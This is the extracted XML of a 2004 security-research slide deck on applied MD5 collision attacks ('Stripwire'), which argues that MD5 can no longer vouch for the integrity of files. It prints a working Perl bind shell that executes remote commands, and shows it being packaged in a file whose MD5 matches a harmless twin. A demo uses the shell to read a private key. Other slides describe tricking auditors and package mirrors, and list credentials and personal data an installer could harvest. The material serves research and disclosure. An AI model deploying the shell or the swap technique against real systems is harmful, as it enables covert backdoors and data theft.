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31C7-3D09-44D4-ABAD-0F5277FEE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1D73-E3BD-4D41-84C2-03CC705F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CB44-4B91-4D16-92E6-4055AB72E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45C5-56B7-4C26-94AF-C8B442F18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1644-01E1-4734-A382-B806C69D0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71574-56DF-4270-8880-E8FAB515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C009-A70B-48B5-96DC-C072AEF5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43D2-E502-43A5-8974-F458D4C6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2661-62B1-4CA6-A137-1DED6994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6336-5039-45F4-9197-28C7937B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02CA-57B3-4250-85A3-42EE4CDE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933A-B1A3-40FB-8B72-80AF2A3F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CAC5-C396-4DBD-A61E-C5664893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CD18-669D-4E02-8F1A-CDE50B90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E63C-7026-4E8B-BE3F-EF3BE0BE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453F-1BC8-4B1D-956D-2B531168C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8E69-329E-4956-9B37-1E316CE85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D78D-001F-4BCC-8561-D2ABD04E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AFAE-4DB4-446C-AC77-0615172D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7D63-FEE7-4361-A38B-DD244763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174F-B930-4467-861E-42AEF900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79D7-DAA0-4652-A40C-472AB486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1E1C-9A11-4B83-A0CE-2CA1D728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DA88-B1D7-49B0-BA5C-DA74DBA5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F2D2-1E1B-40C0-8585-BFAE8053C81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19E0-44B0-4E92-8121-A7FCACD9208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D5 To Be Considered Harmful (Someday)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Dan Kaminsk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102852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Other Shoe Dro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Fire and Ice have the same MD5 hash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d5(x+q) == md5(y+q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x = vec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y = vec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 = encrypted paylo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re executes an arbitrary series of comman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ce resists reverse engineering with the strength of the encryption algorithm (A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102852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mo[0]:  The Vecto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$vec1 = h2b(“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d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c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2f ca b5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87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12 46 7e ab 40 04 58 3e b8 fb 7f 89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55 ad 34 06 09 f4 b3 02 83 e4 88 83 25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71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41 5a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US" sz="1600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>08 51 25 e8 f7 cd c9 9f d9 1d bd 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Courier New"/>
              </a:rPr>
              <a:t>f2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> 80 37 3c 5b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d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6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dd 53 e2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b4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87 da 03 fd 02 39 63 06 d2 48 cd a0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e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80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a8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0d 1e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c6 98 21 bc b6 a8 83 93 96 f9 65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2b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6f f7 2a 70”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$vec2 = h2b(“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d1 31 dd 02 c5 e6 ee c4 69 3d 9a 06 98 af f9 5c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2f ca b5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07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12 46 7e ab 40 04 58 3e b8 fb 7f 89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55 ad 34 06 09 f4 b3 02 83 e4 88 83 25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f1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41 5a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US" sz="1600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>08 51 25 e8 f7 cd c9 9f d9 1d bd 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Courier New"/>
              </a:rPr>
              <a:t>72</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="003366"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> 80 37 3c 5b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d8 82 3e 31 56 34 8f 5b ae 6d ac d4 36 c9 19 c6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dd 53 e2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34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87 da 03 fd 02 39 63 06 d2 48 cd a0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e9 9f 33 42 0f 57 7e e8 ce 54 b6 70 80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28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0d 1e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c6 98 21 bc b6 a8 83 93 96 f9 65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ab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6f f7 2a 70”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102852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mo[1]:  Equival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$ md5sum.exe vec1 vec2; sha1sum.exe vec1 vec2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79054025255fb1a26e4bc422aef54eb4 *vec1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79054025255fb1a26e4bc422aef54eb4 *vec2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a34473cf767c6108a5751a20971f1fdfba97690a *vec1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4283dd2d70af1ad3c2d5fdc917330bf502035658 *vec2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102852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mo[2]: Still The Sam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$ dd if=/dev/urandom bs=1024 count=1024 &gt; arbitrary_dat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1024+0 records i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1024+0 records ou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$ cat vec1 arbitrary_data &gt; v1_arb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$ cat vec2 arbitrary_data &gt; v2_ar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$ md5sum.exe v1_arb v2_arb; sha1sum.exe v1_arb v2_arb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e9b26b1b200e1c848196b264d4589174 *v1_arb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e9b26b1b200e1c848196b264d4589174 *v2_arb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7a7961d6f31dada14f1f20290754c49860c22da4 *v1_arb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466dff783f129c668419cbaa180a5c67b8ace03d *v2_ar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ourier New"/>
              </a:rPr>
              <a:t>But they still differ at the star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102852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mo[3]: Our Paylo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$ cat backlash.pl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#!/usr/bin/perl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# Backlash:  Open a pseudoshell on port 50023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#   Author:  Samy Kamkar, www.lucidx.com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use IO;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while(1){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  while($c=new IO::Socket::INET(LocalPort,         50023,Reuse,1,Listen)-&gt;accept){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           $~-&gt;fdopen($c,w);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           STDIN-&gt;fdopen($c,r);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           system$_ while&lt;&gt;;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  }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mo[4]: Packaging The Paylo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$ ./stripwire.pl -v -b backlash.pl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fire.bin: md5  = 4df01ec3a18df7d7d6cdf8e16e98cd99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ice.bin:  md5  = 4df01ec3a18df7d7d6cdf8e16e98cd99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fire.bin: sha1 = a7f6ebb805ac595e4553f84cb9ec40865cc11e08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ice.bin:  sha1 = 85f602de91440cd877c7393f2a58b5f0d72cbc3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mo[5]: Altered Behavior, Same Ha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$ ./stripwire.pl -v -r ice.bin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Unable to decrypt file: ice.bin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$ ./stripwire.pl -v -r fire.bin &amp;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$ telnet 127.0.0.1 50023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Trying 127.0.0.1...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Connected to 127.0.0.1.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Escape character is '^]'.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cat /etc/ssh_host_dsa_key_demo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-----BEGIN DSA PRIVATE KEY-----MIH5AgEAAkEAlcTshGgpYY0eQgRBJRyQCrBDgXhFWFTbxazsgbrKiebh1aal4ET6vPYZ7/OlPbrKxwMnX5mcEHywmEhOcK00pwIVAJyQ0ZlkpRPr2eJWz/ECgr1XgUvPAkBWeUy6MJHApO5sF+T0V7vs319fGvw0j8dthueQ2pAZHJl063SC2n9JkaMZRHEnJ7c0 4xMEHnFdmIvxTNFCavKZAkEAieVtNTFNNV7SIf0m4z60mJ1Hz3zj50R7ih1SSxPon+IxzKsoAEP9JkyjS67+HBQGpowxNuukOFaqDwl1gclGfwIVAJuPpSn6yj2ez5m7aTzZ7-----END DSA PRIVATE KEY-----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102852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s Tripwire Dead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rt Answer:  N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Externality Argument”:  Executable behavior is not entirely specified by file da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rdware Characteristics (CPU, Temp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le Metadata (Name, Date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etwork Metadata (DNS searchlist, IP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emory-Only Exploi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andom Number Generat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etwork Activity (ET Phone Home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Infallible Auditor Argument”:  Ice must be trusted before Fire may be swapped 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ut why are you trusting ice?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oes Tripwire Have A Problem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rt Answer:  Y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“Externality Argument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hy not just have the application download new code to run?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Yes.  Commands can be gotten from outside the MD5-hashed dataset.  No hashing algorithm can verify the integrity of data it’s not hashing.  But MD5 is failing to verify the integrity of data it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hashing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“Infallible Auditor Argument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ho would trust ice?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at another defense will,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hopefully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prevent the MD5 failure from being exploited does not mean the MD5 failure has not brought us closer to exploitabili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536120" indent="-2192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Black box testing will never detect that Ice can become Fire – and there is another failure mode…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n The Power Of Auditors[0]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lting Problem limits ability of audito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bfuscatory capabilities are great – couple bit difference allows for the envelopment of payload in AES shel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ncrypted data and compressed data have near-identical entropy profiles – embedded compressed content comm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an also embed a JPEG containing steganographically encoded instruc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I can “trick” an auditor into trusting something that will never actually do any damage, no matter what the inputs or outputs happen to be,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he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I can later swap that perfectly harmless executable for one with arbitrary behavi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his is new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102852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s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D5:  Hashing algorith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ngerprint” of data – easy to synthesize (push here), hard to fake (grow thi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nown since 1997 it was theoretically not so hard to create two different sets of data with the same has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cently:  Not so theoretic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ll they released:  The two sets of data (“vectors”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n The Power Of Auditors[1]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ffie-Helman Prime Confl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gnificant because there’s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nothing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an auditor to detect, but the failure critically defeats a cryptographic subsyste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iscovered by John Kelsey, verified by Ben Lauri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H requires prime modul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ec1 || 0000000000000000000000000000001B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s pri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ec2 || 0000000000000000000000000000001B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s not pri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nd Vec1 set to auditor –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impossible to detect that vec2 can be swapped in to destroy the cryptosyste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pplied Failure Scenari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uditor Bypa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velopers send one payload to testers, another to facto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velopers can be seen as auditors too – infect the build tools, only what gets shipped gets infected.  Developers can’t use MD5 hash to verify equivalence between sent and shippe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tributed Package Manage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D5 hashes are centrally distributed, along with mirror lists.  Files acquired from mirrors are tested against MD5 hash.  If match, install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rrors can send Ice to central package manager and Fire to whoever they lik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t Commitment Also Fal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t Commitment (Slashdotte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ice sends Bob MD5 hash of data, “committing” her to some datas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ob makes bets based on what he guesses Alice h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nded Behavior:  Bob registers bets, Alice sends data, Bob verifies hash, Alice pays off be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w Behavior:  Bob registers bets, Alice selects dataset where she wins, Bob verifies hash, Alice doesn’t p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(Still Secret) Actual Attac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verything we’ve done has been with just the test vecto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ppend only, single bit of inform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tual attack is much more powerfu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justs to any state of the MD5 machi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an now both append and prepend w/o changing final has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re.exe and Ice.exe – no execution harnes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n create any number of swappable collisions – actually relatively fast to do so (Joux’s insight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oppelganger” blocks – they may exist anywhere within a file, and may be swapped out for one another without altering the ultimate MD5 has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MAC:  Not Completely Invulnerab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MAC algorithm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ner = MD5(Key XOR 0x36 + Dat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uter = MD5(Key XOR 0x5c + Inn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MAC-MD5 = Out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en said this is totally immune.  It’s no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ctual attack adapts to any initial state.  Inner creates a new initial state that Data is integrated into.  If attacker knows Key, can create colliding da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ould be impossible if Data was double-hashed in both Inner and Outer loop – would have to adapt Data to two different initial stat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MAC: Arguably Invulnerable Enoug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C Primitive is allowed to collapse when key is know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st other MACs d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his completely obviates most applied ris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ill worth noting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’ve never been able to create an HMAC-MD5 collision before, key or no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MAC-MD5 has degraded in a way HMAC-SHA1 has no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crosoft X-BOX signs HMAC-SHA1.  There are thus deployed products that desire both collision resistance and MAC properti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igital signatures completely vulnerab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102852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ts and Pie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ec1 vs. Vec2 = A Single Bit Of Inform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ppose we can calculate multicollis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 collisions = 1 bit (2^1), 4 collisions = 2 bits (2^2), 256 collisions = 8 bits (2^8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ote it gets more and more expensive to add bits this wa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ember we aren’t tied to the default initial state of MD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 can chain sets of doppelgangers togeth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a capacity is summed across every s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6 blocks, each adapting to emitted state of the last, each with 256 possibilities, yields 128 bi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102852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D5 Steganograph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ta can be embedded within a supposedly “constant” file that actually changes, with MD5 unable to see those chan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C-32 and TCP/IP checksums vulnerable to this to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ut MD5 promises computational infeasibility – “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is is the exact same data you hashed back the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doesn’t have to b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fense against malicious intent part of the MD5 manda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102852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2P Yeah You Know M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P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P3 players skip over “garbage blocks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ec1/vec2 or our doppelganger se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2P tools commonly distribute MP3’s; use hashes to organize this distribu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arching – Hashes coalesce identical conten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erifying – Hashes guarantee what was searched for is what was download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ote:  I’m not taking sides.  I’m demonstrating broken application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ossible to prepend each MP3 with a 128 bit multi-doppelganger set, without breaking search or violating integr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llows tracing 3</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike" baseline="30000">
                <a:solidFill>
                  <a:srgbClr val="003366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generation downloads to 2</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="18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uploa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102852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ecute Ab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mit of MP3 tracing:  Can only get back what you put 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P3 decoders not Turing complete (sans major exploit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oftware installers are, thoug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staller Strikeback:  Installer self-modifies w/ fingerprint of host it’s being installed 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stead of trying to trick the attacker into “phoning home” (say with DNS), piggyback on their inevitable generosity to share n most valuable bi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n also work multi-generation – i.e. mutate as distributed along a P2P network, and the net won’t notice / compla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102852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imit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oor understanding of how to actually exploit the MD5 colli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llision mechanism unreleas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llisions only creatable between two specially designed sets of data – not a general purpose attac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ame output as the birthday attack.  So, if birthday dropped MD5 security to 2^64 (which we’ve said for years), Wang dropped MD5 security to 2^24-2^32.  Ouch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ummary:  A fundamental constraint of the system has been violated…but what this means is uncle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102852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ersonal Identifi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tuff to ge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etwork data -- IP address, DNS name, default name server, MAC addres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rowser Cookies, Caches, and Password Stores -- Online Banking, Hotmail, Amazon 1-Clic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ached Instant Messenger Credentials -- Yahoo, AOL IM, MSN, Trillia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2P Memberships -- KaZaA, Gnutella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rporate Identifiers -- VPN Client Data / Log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hipped Material -- CPU ID, Vendor ID, Windows Activation Ke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ystem Configurations -- Time Zone, Telephone API area cod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reless Data -- MAC addresses of local access poin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istence Tests -- Special files in download direct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040" y="102852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Cave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ne of this works w/o the actual atta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’t make new doppelganger block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’t chain from anything but default MD5 initial sta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e we los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– thank you KaZa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102852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cking the kzha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zhash – custom hashing mode using MD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sed on Merkle’s Tiger Tre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ot the standard “magnet”/TTH lin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rst half = MD5(first 300K of fi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half = All proceeding 32K chunk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wo benefi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le to distribute hashing load across time to download, even with out of order data acquisi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le to efficiently calculate integrity-verifying sums for partial datase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102852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moking the kzha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starting the hash every 32K ==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ash begins from initial state every 32K ==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ash begins from vec1/vec2 state every 32K ==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 can embed one bit every 32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pecific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ec1 and Vec2 are 128 bytes apiece (0.09% efficiency,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ow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2768-128=32640 bytes of payloa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nly 0.4% data expans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P3:  Average size == 4.5MB =&gt; 4.2MB of 32K chunks =&gt; 134 bits of KaZaA-stego per MP3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oda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pps:  Average size == 60MB =&gt; 1920 bi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dded space offset by need for redundancy – larger the file, more hosts may serve 32K chunk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040" y="102852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zhash Dem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#setup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dd if=/dev/urandom of=foo bs=32640 \ count=1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cat vec1 foo &gt; 1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cat vec2 foo &gt; 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$ cat 1 1 0 1 1 0 1 0 | perl kzhash.pl 76b5764721b8911cf227066e11837142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$ cat 0 0 0 0 1 1 1 1 | perl kzhash.pl 76b5764721b8911cf227066e1183714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orks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toda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102852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’ve known MD5 was weak for a very long ti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997 was the first brick to fal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will co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SHA-1! </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US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102852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Ques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 it possible, with nothing but the two vectors with matching MD5 hashes, to find an applied security ris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swer:  Y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veats:  This is early.  This is rudimentary.  This is not the BIC Pen to the tubular lock of MD5.  But it’s interestin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102852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The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D5 presents functionally weaker security constraints than the cryptographically secure hash primitive offers in general, and SHA-1 in particula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  MD5 hashes can no longer imply the behavior of executable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f md5(exe1) == md5(exe2), behavior(exe1) ?= behavior(exe2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ripwire”, C(CC|N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  MD5 hashes can no longer imply the information equivalence of datase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f md5(data1) == md5(data2),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formation(data1) ?= information(data2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2P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102852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MD5 Wor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D5 is a block-based algorith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rt with a 128 bit system state (arbitrar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ir in 512 bits of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peat until no more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d up with 128 bits, all stirred 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urity is provided by the difficulty of figuring out how to precisely stir the initial st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Curious Trait of Block Based Hash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two files have the same hash, then two files appended with the same data also have the same has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f md5(x) == md5(y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n md5(x+q) == md5(y+q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ssuming length(x) mod 64 =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information of the two files’ difference was lost in the stirr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s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 well known trai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among those who work with block-based algorithm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102852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fini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c1, vec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ur two files (“vectors”) with the exact same has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ylo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set of commands to do “stuff”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crypted Paylo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yload encrypted using the SHA-1 hash of vec1 as a ke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102852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 Fire and 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wo Files:  Fire and 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r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= vec1 and Encrypted Payloa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c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= vec2 and Encrypted Payloa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re contains sufficient context to be decrypted and execu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ey=sha1(vec1), which decrypts the payloa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ce doesn’t contain vec1, so there’s insufficient context to decrypt the paylo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payload is froze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20:34:23Z</dcterms:created>
  <dc:creator>kaminsky</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>kaminsky</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2004-12-27T17:16:09Z</dcterms:modified>
  <cp:revision>25</cp:revision>
  <dc:subject/>
  <dc:title>Stripwire: An Early Applied MD5 Attack</dc:title>
</cp:coreProperties>
</file>